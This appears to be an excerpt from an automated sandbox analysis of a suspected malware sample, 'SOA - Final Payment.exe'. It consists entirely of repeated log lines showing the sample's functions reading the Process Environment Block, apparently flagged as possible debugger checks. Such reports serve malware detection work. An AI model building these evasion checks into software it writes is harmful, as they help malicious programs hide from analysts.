                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A mov eax, dword ptr fs:[00000030h]5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A mov eax, dword ptr fs:[00000030h]5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013453FC mov eax, dword ptr fs:[00000030h]5_2_013453FC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F3E6 mov eax, dword ptr fs:[00000030h]5_2_0132F3E6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A63FF mov eax, dword ptr fs:[00000030h]5_2_012A63FF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0132B3D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F63C0 mov eax, dword ptr fs:[00000030h]5_2_012F63C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132C3CD mov eax, dword ptr fs:[00000030h]5_2_0132C3CD
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345227 mov eax, dword ptr fs:[00000030h]5_2_01345227
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126823B mov eax, dword ptr fs:[00000030h]5_2_0126823B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7208 mov eax, dword ptr fs:[00000030h]5_2_012A7208
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7208 mov eax, dword ptr fs:[00000030h]5_2_012A7208
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126826B mov eax, dword ptr fs:[00000030h]5_2_0126826B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133D26B mov eax, dword ptr fs:[00000030h]5_2_0133D26B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133D26B mov eax, dword ptr fs:[00000030h]5_2_0133D26B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B1270 mov eax, dword ptr fs:[00000030h]5_2_012B1270
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B1270 mov eax, dword ptr fs:[00000030h]5_2_012B1270
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01299274 mov eax, dword ptr fs:[00000030h]5_2_01299274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B256 mov eax, dword ptr fs:[00000030h]5_2_0132B256
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B256 mov eax, dword ptr fs:[00000030h]5_2_0132B256
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269240 mov eax, dword ptr fs:[00000030h]5_2_01269240
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269240 mov eax, dword ptr fs:[00000030h]5_2_01269240
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A724D mov eax, dword ptr fs:[00000030h]5_2_012A724D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F8243 mov eax, dword ptr fs:[00000030h]5_2_012F8243
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F8243 mov ecx, dword ptr fs:[00000030h]5_2_012F8243
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A250 mov eax, dword ptr fs:[00000030h]5_2_0126A250
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01276259 mov eax, dword ptr fs:[00000030h]5_2_01276259
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD250 mov ecx, dword ptr fs:[00000030h]5_2_012FD250
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802A0 mov eax, dword ptr fs:[00000030h]5_2_012802A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802A0 mov eax, dword ptr fs:[00000030h]5_2_012802A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013072A0 mov eax, dword ptr fs:[00000030h]5_2_013072A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013072A0 mov eax, dword ptr fs:[00000030h]5_2_013072A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov ecx, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov eax, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov eax, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov ecx, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov ecx, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE284 mov eax, dword ptr fs:[00000030h]5_2_012AE284
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE284 mov eax, dword ptr fs:[00000030h]5_2_012AE284
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A329E mov eax, dword ptr fs:[00000030h]5_2_012A329E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A329E mov eax, dword ptr fs:[00000030h]5_2_012A329E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345283 mov eax, dword ptr fs:[00000030h]5_2_01345283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802E1 mov eax, dword ptr fs:[00000030h]5_2_012802E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802E1 mov eax, dword ptr fs:[00000030h]5_2_012802E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802E1 mov eax, dword ptr fs:[00000030h]5_2_012802E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F2F8 mov eax, dword ptr fs:[00000030h]5_2_0132F2F8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013452E2 mov eax, dword ptr fs:[00000030h]5_2_013452E2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012692FF mov eax, dword ptr fs:[00000030h]5_2_012692FF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED mov eax, dword ptr fs:[00000030h]5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012792C5 mov eax, dword ptr fs:[00000030h]5_2_012792C5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012792C5 mov eax, dword ptr fs:[00000030h]5_2_012792C5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A2C3 mov eax, dword ptr fs:[00000030h]5_2_0127A2C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A2C3 mov eax, dword ptr fs:[00000030h]5_2_0127A2C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A2C3 mov eax, dword ptr fs:[00000030h]5_2_0127A2C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A2C3 mov eax, dword ptr fs:[00000030h]5_2_0127A2C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A2C3 mov eax, dword ptr fs:[00000030h]5_2_0127A2C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C0 mov eax, dword ptr fs:[00000030h]5_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B2D3 mov eax, dword ptr fs:[00000030h]5_2_0126B2D3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B2D3 mov eax, dword ptr fs:[00000030h]5_2_0126B2D3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B2D3 mov eax, dword ptr fs:[00000030h]5_2_0126B2D3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F2D0 mov eax, dword ptr fs:[00000030h]5_2_0129F2D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F2D0 mov eax, dword ptr fs:[00000030h]5_2_0129F2D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345537 mov eax, dword ptr fs:[00000030h]5_2_01345537
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127D534 mov eax, dword ptr fs:[00000030h]5_2_0127D534
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131F525 mov eax, dword ptr fs:[00000030h]5_2_0131F525
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E53E mov eax, dword ptr fs:[00000030h]5_2_0129E53E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E53E mov eax, dword ptr fs:[00000030h]5_2_0129E53E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E53E mov eax, dword ptr fs:[00000030h]5_2_0129E53E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E53E mov eax, dword ptr fs:[00000030h]5_2_0129E53E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E53E mov eax, dword ptr fs:[00000030h]5_2_0129E53E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD530 mov eax, dword ptr fs:[00000030h]5_2_012AD530
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD530 mov eax, dword ptr fs:[00000030h]5_2_012AD530
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B52F mov eax, dword ptr fs:[00000030h]5_2_0132B52F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280535 mov eax, dword ptr fs:[00000030h]5_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7505 mov eax, dword ptr fs:[00000030h]5_2_012A7505
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7505 mov ecx, dword ptr fs:[00000030h]5_2_012A7505
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01344500 mov eax, dword ptr fs:[00000030h]5_2_01344500
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A656A mov eax, dword ptr fs:[00000030h]5_2_012A656A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A656A mov eax, dword ptr fs:[00000030h]5_2_012A656A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A656A mov eax, dword ptr fs:[00000030h]5_2_012A656A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126B562 mov eax, dword ptr fs:[00000030h]5_2_0126B562
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AB570 mov eax, dword ptr fs:[00000030h]5_2_012AB570
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AB570 mov eax, dword ptr fs:[00000030h]5_2_012AB570
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01278550 mov eax, dword ptr fs:[00000030h]5_2_01278550
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01278550 mov eax, dword ptr fs:[00000030h]5_2_01278550
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915A9 mov eax, dword ptr fs:[00000030h]5_2_012915A9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915A9 mov eax, dword ptr fs:[00000030h]5_2_012915A9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915A9 mov eax, dword ptr fs:[00000030h]5_2_012915A9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915A9 mov eax, dword ptr fs:[00000030h]5_2_012915A9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915A9 mov eax, dword ptr fs:[00000030h]5_2_012915A9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F05A7 mov eax, dword ptr fs:[00000030h]5_2_012F05A7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F05A7 mov eax, dword ptr fs:[00000030h]5_2_012F05A7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F05A7 mov eax, dword ptr fs:[00000030h]5_2_012F05A7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013035BA mov eax, dword ptr fs:[00000030h]5_2_013035BA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013035BA mov eax, dword ptr fs:[00000030h]5_2_013035BA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013035BA mov eax, dword ptr fs:[00000030h]5_2_013035BA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013035BA mov eax, dword ptr fs:[00000030h]5_2_013035BA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F5BE mov eax, dword ptr fs:[00000030h]5_2_0132F5BE
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012945B1 mov eax, dword ptr fs:[00000030h]5_2_012945B1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012945B1 mov eax, dword ptr fs:[00000030h]5_2_012945B1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F5B0 mov eax, dword ptr fs:[00000030h]5_2_0129F5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A4588 mov eax, dword ptr fs:[00000030h]5_2_012A4588
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272582 mov eax, dword ptr fs:[00000030h]5_2_01272582
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272582 mov ecx, dword ptr fs:[00000030h]5_2_01272582
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126758F mov eax, dword ptr fs:[00000030h]5_2_0126758F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126758F mov eax, dword ptr fs:[00000030h]5_2_0126758F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126758F mov eax, dword ptr fs:[00000030h]5_2_0126758F
